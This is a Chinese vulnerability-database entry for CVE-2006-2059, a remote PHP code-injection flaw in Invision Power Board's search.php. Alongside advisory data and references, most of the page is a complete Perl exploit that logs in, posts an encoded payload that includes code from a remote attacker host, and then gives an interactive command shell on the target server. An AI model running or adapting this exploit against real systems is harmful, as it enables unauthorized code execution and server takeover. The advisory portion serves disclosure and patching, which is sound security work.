CVE-2006-2059
CVSS5.0
发布时间 :2006-04-26 16:06:00
修订时间 :2011-03-07 21:35:05
NMCOE    

[原文]action_public/search.php in Invision Power Board (IPB) 2.1.x and 2.0.x before 20060425 allows remote attackers to execute arbitrary PHP code via a search with a crafted value of the lastdate parameter, which alters the behavior of a regular expression to add a "#e" (execute) modifier.


[CNNVD]Invision Power Board search.php脚本代码注入漏洞(CNNVD-200604-514)

        Invision Power Board是一款流行的PHP论坛程序。
        Invision Power Board的search.php脚本处理变量时存在输入验证漏洞,远程攻击者可能利用此漏洞注入PHP代码获取执行。
        在preg_replace()中使用之前Invision Power Board没有正确的过滤search.php中对lastdate参数的过滤,导致可以通过样式修改符"e"注入任意PHP代码。
        sources/action_public/search.php 1261行漏洞代码:
        $this->output = preg_replace( \
        "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 \
        selected='selected'", $this->output );
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2059
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2059
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-514
(官方数据源) CNNVD

- 其它链接及资源

http://forums.invisionpower.com/index.php?showtopic=213374
(PATCH)  CONFIRM  http://forums.invisionpower.com/index.php?showtopic=213374
http://www.vupen.com/english/advisories/2006/1534
(UNKNOWN)  VUPEN  ADV-2006-1534
http://www.securityfocus.com/bid/17695
(UNKNOWN)  BID  17695
http://www.securityfocus.com/archive/1/archive/1/431990/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060425 Invision Vulnerabilities, including remote code execution
http://xforce.iss.net/xforce/xfdb/26070
(UNKNOWN)  XF  invision-search-file-include(26070)
http://www.securityfocus.com/archive/1/archive/1/439607/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060710 Re: RE: Invision Vulnerabilities, including remote code execution
http://www.securityfocus.com/archive/1/archive/1/432451/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060427 Invision Power Board 2.1.5 POC
http://www.securityfocus.com/archive/1/archive/1/432226/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060427 Re: Invision Vulnerabilities, including remote code execution
http://www.osvdb.org/25005
(UNKNOWN)  OSVDB  25005
http://securityreason.com/securityalert/796
(UNKNOWN)  SREASON  796
http://secunia.com/advisories/19830
(UNKNOWN)  SECUNIA  19830

- 漏洞信息

Invision Power Board search.php脚本代码注入漏洞
中危 输入验证
2006-04-26 00:00:00 2006-04-27 00:00:00
远程  
        Invision Power Board是一款流行的PHP论坛程序。
        Invision Power Board的search.php脚本处理变量时存在输入验证漏洞,远程攻击者可能利用此漏洞注入PHP代码获取执行。
        在preg_replace()中使用之前Invision Power Board没有正确的过滤search.php中对lastdate参数的过滤,导致可以通过样式修改符"e"注入任意PHP代码。
        sources/action_public/search.php 1261行漏洞代码:
        $this->output = preg_replace( \
        "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 \
        selected='selected'", $this->output );
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://forums.invisionpower.com/index.php?showtopic=213374

- 漏洞信息 (1720)

Invision Power Board <= 2.1.5 (lastdate) Remote Code Execution Exploit (EDBID:1720)
php webapps
2006-04-26 Verified
0 RusH
N/A [点击下载]
#!/usr/bin/perl

## Invision Power Board 2.* commands execution exploit by RST/GHC
## vulnerable versions <= 2.1.5
## tested on 2.1.4, 2.0.2
##
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru


use IO::Socket;
use Getopt::Std;

getopts("l:h:p:d:f:v:");

$host     = $opt_h;
$dir      = $opt_d;
$login    = $opt_l;
$password = $opt_p;
$forum    = $opt_f;
$version  = $opt_v || 0;

$|++;

header();
if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }

print "[~]    SERVER : $host\r\n";
print "[~]      PATH : $dir\r\n";
print "[~]     LOGIN : $login\r\n";
print "[~]  PASSWORD : $password\r\n";
print "[~]    TARGET : $version";
print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
print "\r\n";

print "[~] Login ... ";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
$login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$post     = 'UserName='.$login.'&PassWord='.$password;
$loggedin = 0;
print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
print $sock "Host: $host\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";
while (<$sock>)
{  
 if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
}
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
print $sock "GET ${dir}index.php HTTP/1.1\r\n";
print $sock "Host: $host\r\n";
print $sock "Cookie: session_id=$sid;\r\n";
print $sock "Connection: close\r\n\r\n";
while (<$sock>)
{    
 if(/act=Login&amp;CODE=03/) { $loggedin = 1; last; }
}
if($loggedin) { print " [ DONE ]\r\n"; }
else { print " [ FAILED ]\r\n"; exit(); }

print "[+] SID: $sid\r\n";

print "[~] Try get md5_check ...";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
if($version==1)
 {
 print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
 }
else
 {
 print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
 }
print $sock "Host: $host\r\n";
print $sock "Cookie: session_id=$sid;\r\n";
print $sock "Connection: close\r\n\r\n";
while (<$sock>)
 {  
 if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }
 if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
 }
close($sock);
if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
else { print " [ FAILED ]\r\n"; exit(); }

print "[~] Create new message ...";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
$created = 0;
$text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
        '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
print $sock "POST ${dir}index.php HTTP/1.1\r\n";
print $sock "Host: $host\r\n";
print $sock "Cookie: session_id=$sid;\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";
while (<$sock>)
 {  
 if(/Location:/) { $created = 1; last; }
 }
if($created) { print " [ DONE ]\r\n"; }
else { print " [ FAILED ]\r\n"; exit(); }

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[~] Search message ...";
$post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
print $sock "Host: $host\r\n";
print $sock "Cookie: session_id=$sid;\r\n";
print $sock "Connection: close\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\r\n\r\n";
print $sock "$post";
print $sock "\r\n\r\n";

while (<$sock>)
 {
 if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
 }

if($searchid) { print " [ DONE ]\r\n"; }
else { print "[ FAILED ]\r\n"; exit(); }
print "[+] SEARCHID: $searchid\r\n";

$get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';

while ()
 {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }

sub run()
 {
  $cmd =~ s/(.*);$/$1/eg;
  $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
  $cmd2 .= $cmd;
  $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
  
  print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
  print $sock "Host: $host\r\n";
  print $sock "Cookie: session_id=$sid;\r\n";
  print $sock "Connection: close\r\n\r\n";

  $on = 0;
  $runned = 0;
  while ($answer = <$sock>)
   {
    if ($answer =~ /^_END_/) { return 0; }
    if ($on == 1) { print "  $answer"; }
    if ($answer =~ /^_START_/) { $on = 1; }
   }
 }
 
sub header()
 {
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";   
 print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
 }
 
sub usage()
 {
 print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
 print "<host>     - host where IPB installed e.g www.ipb.com\r\n";
 print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";
 print "<login>    - login of any exist user\r\n";
 print "<password> - and password too )\r\n";
 print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";
 print "<version>  - forum version:\r\n";
 print "             0 - 2.0.*\r\n";
 print "             1 - 2.1.*\r\n";
 exit();
 }

# milw0rm.com [2006-04-26]
		

- 漏洞信息

25005
Invision Power Board search.php lastdate Variable Arbitrary PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Invision Power Board contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not properly validate the 'lastdate' variable in a "preg_replace()" call in the search.php script. This could allow a user to inject and execute arbitrary PHP code via the "e" pattern modifier, leading to a loss of integrity.

- 时间线

2006-04-25 Unknow
2006-04-25 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站